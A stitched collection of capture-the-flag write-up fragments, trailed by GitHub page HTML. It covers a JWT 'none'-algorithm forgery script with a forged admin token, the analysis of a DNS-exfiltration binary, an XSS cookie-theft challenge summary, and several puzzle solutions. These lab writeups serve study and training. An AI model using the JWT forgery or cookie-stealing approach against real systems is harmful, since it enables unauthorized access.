**Meet the "None" Algorithm:** <https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/>
A simple python scripts allows us to craft a JWT with the None algorithm.
```python# https://pyjwt.readthedocs.io/en/latest/import jwt
payload = {'id' : 'admin', 'admin': True}print(jwt.encode(payload, None, algorithm=None, headers={'kid': 'da39a3ee5e6b4b0d3255bfef95601890afd80709'}))```
```eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIiwia2lkIjoiZGEzOWEzZWU1ZTZiNGIwZDMyNTViZmVmOTU2MDE4OTBhZmQ4MDcwOSJ9.eyJpZCI6ImFkbWluIiwiYWRtaW4iOnRydWV9.```
And now we can access the administration page. |
This challenge can be solved following different approaches. We provided a binary file compiled using Nuitka in a MacOS with M1 process and using the clang compiler.Since we used a python version hard to decompile, so the best approach is to try to look directly at the binary, or try to run the application and analyse the application behaviour. The goal of this binary is to exfiltrate information using DNS requests, and its implementation has a mode to test the service.
The test mode tries to exfiltrate 7 files that are the flag split into seven parts. These files do not need to exist.
A different way to access the names of these 7 files is by looking at the binary. Using strings command, we obtain the beginning of the flag "CTFUA{".
Using the xxd command and sending the output to a file, we can search for keywords. By searching for the word we found ("CTFUA{"), we obtain the following scenario.
In this analyse, we were able to identify the "FLAG_TEST", which is followed by something not usual in base32 `IZWGCZZANFZSA3TPOQQGS3RAORUGS4ZAOZQXE===`.
```000ad240: 6143 5446 0061 464c 4147 5f54 4553 5400 aCTF.aFLAG_TEST.000ad250: 5401 0000 0075 495a 5747 435a 5a41 4e46 T....uIZWGCZZANF000ad260: 5a53 4133 5450 4f51 5147 5333 5241 4f52 ZSA3TPOQQGS3RAOR000ad270: 5547 5334 5a41 4f5a 5158 453d 3d3d 0054 UGS4ZAOZQXE===.T```
Using CyberChef, we can obtain the string "Flag is not in this var" (https://gchq.github.io/CyberChef/#recipe=From_Base32('A-Z2-7%3D',true)&input=SVpXR0NaWkFORlpTQTNUUE9RUUdTM1JBT1JVR1M0WkFPWlFYRT09PQ). However, there are more evidences of strings in base32 format.
```000ad2b0: 6145 5534 434f 4d52 4800 7541 5a51 5859 aEU4COMRH.uAZQXY000ad2c0: 4549 4b42 4546 5141 3d3d 3d00 7541 4251 EIKBEFQA===.uABQ000ad2d0: 5159 4651 5744 5149 4257 3d3d 3d00 7542 QYFQWDQIBW===.uB000ad2e0: 4d4b 4141 4541 5544 5541 4249 3d3d 3d00 MKAAEAUDUABI===.000ad2f0: 7541 4e32 514d 4544 5443 4d4d 4134 3d3d uAN2QMEDTCMMA4==000ad300: 3d00 7542 5234 5153 4649 4343 3446 5232 =.uBR4QSFICC4FR2000ad310: 3d3d 3d00 7544 513d 3d3d 3d3d 3d00 7549 ===.uDQ======.uI```
The pieces of interest are: "EU4COMRH", "AZQXYEIKBEFQA===", "ABQQYFQWDQIBW===", "BMKAAEAUDUABI===", "AN2QMEDTCMMA4===", "BR4QSFICC4FR2===" and "DQ======".Using CyberChef with the value "EU4COMRH" as input, and the recipes "From Base32" and "XOR" with the key CTFUA (which is the beginning of the flag) to obtain the "flagf" value. So, we need to keep "flag" as a key for future reference.The next blocks were bigger than the first (except the last). These blocks were XOR with the block before, similar to CFB mode chipher.
```"EU4COMRH" -> "EU4COMRH""AZQXYEIKBEFQA===" -> "C4HREDYH""ABQQYFQWDQIBW===" -> "CUDDSXIS""BMKAAEAUDUABI===" -> "HADTGEIG""AN2QMEDTCMMA4===" -> "K4BD4VQI""BR4QSFICC4FR2===" -> "GMKQ6AZT""DQ======" -> "DQ======"```
These pieces need to be concatenated, so you obtain the flag in base32 "EU4COMRHC4HREDYHCUDDSXISHADTGEIGK4BD4VQIGMKQ6AZTDQ======". To obtain the flag, just use the same 2 recipes in CyberChef "From Base32" and "XOR" with the key "flag".
## Flag
CTFUA{nuikta_1s_a_pa1n_1n_the_} |
**Vanity Check I (418pts) - by Eth007***Description*Can't get enough Sanity Check challenges? Check out Vanity Check, our new and improved Sanity Check!nc vanity-check-i.idek.team 1337
A format string vulnerability pwn.
|
## Summary“Toy Workshop” was the web challenge released on day 1 and showed off an interesting way to do a classic XSS attack. We’ll start by finding a simple web app where we can forward messages to the “manager” of the workshop. Looking at the source code, we see that the queries are stored in a SQL database, and viewed using the “puppeteer” module, which creates a browser instance to view the database(probably to emulate the “manager”). We can leverage this by writing a XSS payload to take the cookie stored in the browser, and send it to a simple webserver using ngrok to tunnel the traffic to our VM. Follow the link [here](https://an00brektn.github.io/htb-santa-toy-workshop/) to see the technical details. |
# WEIRD FRIEND
## Description
My weird friend did it again! I gave him my list of questions and asked him for a quick response. He took things literally and this is what he gave me!? Can you make any sense of it?
## Attachmentsweird_friend.txt
## Writeup
The word "quick response" leads me to "QR Code". By entering the content into [Binary to QR Code Tool](https://bahamas10.github.io/binary-to-qrcode/), we get the QR code.
Well ... IT people are lazy as we don't want to type the flag our own so we downloaded the QR code (`qr.png`) and entered it into CyberChef, using the Parse QR Code and normalize image tool, we get our flag.
## Flag`TFCCTF{why_ar3_QR_C0d3s_s0-complicated!?o00o0f}` |
**Flag Was just encoded in base64 , Strings is enough to get the flag**
Flag : HTB{0k_n0w_3v3ry0n3_h4s_t0_dr0p_0ff_th3ir_l3tt3rs_4t_th3_p0st_0ff1c3_4g41n} ```┌──(kali㉿kali)-[~/HTBCTF/forensic/forensics_baby_apt]└─$ strings -n 100 christmaswishlist.pcap|grep -i cmd|grep echo|cut -d "+" -f6|base64 -d
HTB{0k_n0w_3v3ry0n3_h4s_t0_dr0p_0ff_th3ir_l3tt3rs_4t_th3_p0st_0ff1c3_4g41n} ``` |
# Polyphenol.py
```pythonfrom z3 import *
s = Solver()
a = [Int(f'a{i}') for i in range(34)]
points = [4, 26, 22, 30, 1, 0, 2, 28, 23, 6, 25, 15, 5, 17, 14, 3, 13]
l = [6218619148819094267912, 3239660278168289094170378865781537878483145039862, 13167423991006904868698304825721530103488567362, 362300164581366743933077318596814390341728710066538, 2912, 68, 1115908868222, 37269531510352347514290324712333731253807861642016, 56973337294691266392513915302684316231304471586, 3613524058959314538010460402, 889396341293302641051808753025749133146757798168, 43685960244566626421146033917835089685178, 9183044381254551882537188, 2694648608589552169772471076958756166751152, 4505915953382938147124977926390455694362, 529597204775372366, 392892826701163426612412172019222254476]
x = 0
for i in range(34): s.add(a[i] >= 0x20, a[i] <= 0x7f)
for x in range(len(points)): sum = 0 for i in range(34): sum += a[i] * points[x] ** i s.add(sum == l[x])
s.check()m = s.model()
w = ''
for i in range(34): w += chr(m[a[i]].as_long())
print(f'idek{{{w}}}')
```
# FLAG
**`idek{D1d_y0u_s34rch_7h1s_p0ly_6y_LLL???}`**
|
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>MetaRed2021-5th-Writeups/forensics/its_full_of_bits at master · uac-ctf/MetaRed2021-5th-Writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="88A5:1F9B:4C9D9F2:4EB38F5:64121C54" data-pjax-transient="true"/><meta name="html-safe-nonce" content="8f00c82acf42f6080281ec7eadb6600be1caa3a5e278d93538584df15dd48149" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4OEE1OjFGOUI6NEM5RDlGMjo0RUIzOEY1OjY0MTIxQzU0IiwidmlzaXRvcl9pZCI6IjM3Mjg3MTMxMDU2NTc2OTk0MTIiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="88914efe436a757d65e2e31fbf0e08377e7eeaffa6de399f8a284355efdc014b" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:439026600" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Write-ups for CTF Internacional MetaRed 2021 5th stage - MetaRed2021-5th-Writeups/forensics/its_full_of_bits at master · uac-ctf/MetaRed2021-5th-Writeups"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/da3f40d568974df1aa25dc1c169439a8d6773e95c122976580e2e595665ecea7/uac-ctf/MetaRed2021-5th-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="MetaRed2021-5th-Writeups/forensics/its_full_of_bits at master · uac-ctf/MetaRed2021-5th-Writeups" /><meta name="twitter:description" content="Write-ups for CTF Internacional MetaRed 2021 5th stage - MetaRed2021-5th-Writeups/forensics/its_full_of_bits at master · uac-ctf/MetaRed2021-5th-Writeups" /> <meta property="og:image" content="https://opengraph.githubassets.com/da3f40d568974df1aa25dc1c169439a8d6773e95c122976580e2e595665ecea7/uac-ctf/MetaRed2021-5th-Writeups" /><meta property="og:image:alt" content="Write-ups for CTF Internacional MetaRed 2021 5th stage - MetaRed2021-5th-Writeups/forensics/its_full_of_bits at master · uac-ctf/MetaRed2021-5th-Writeups" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="MetaRed2021-5th-Writeups/forensics/its_full_of_bits at master · uac-ctf/MetaRed2021-5th-Writeups" /><meta property="og:url" content="https://github.com/uac-ctf/MetaRed2021-5th-Writeups" /><meta property="og:description" content="Write-ups for CTF Internacional MetaRed 2021 5th stage - MetaRed2021-5th-Writeups/forensics/its_full_of_bits at master · uac-ctf/MetaRed2021-5th-Writeups" /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/uac-ctf/MetaRed2021-5th-Writeups git https://github.com/uac-ctf/MetaRed2021-5th-Writeups.git">
<meta name="octolytics-dimension-user_id" content="80677398" /><meta name="octolytics-dimension-user_login" content="uac-ctf" /><meta name="octolytics-dimension-repository_id" content="439026600" /><meta name="octolytics-dimension-repository_nwo" content="uac-ctf/MetaRed2021-5th-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="439026600" /><meta name="octolytics-dimension-repository_network_root_nwo" content="uac-ctf/MetaRed2021-5th-Writeups" />
<link rel="canonical" href="https://github.com/uac-ctf/MetaRed2021-5th-Writeups/tree/master/forensics/its_full_of_bits" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
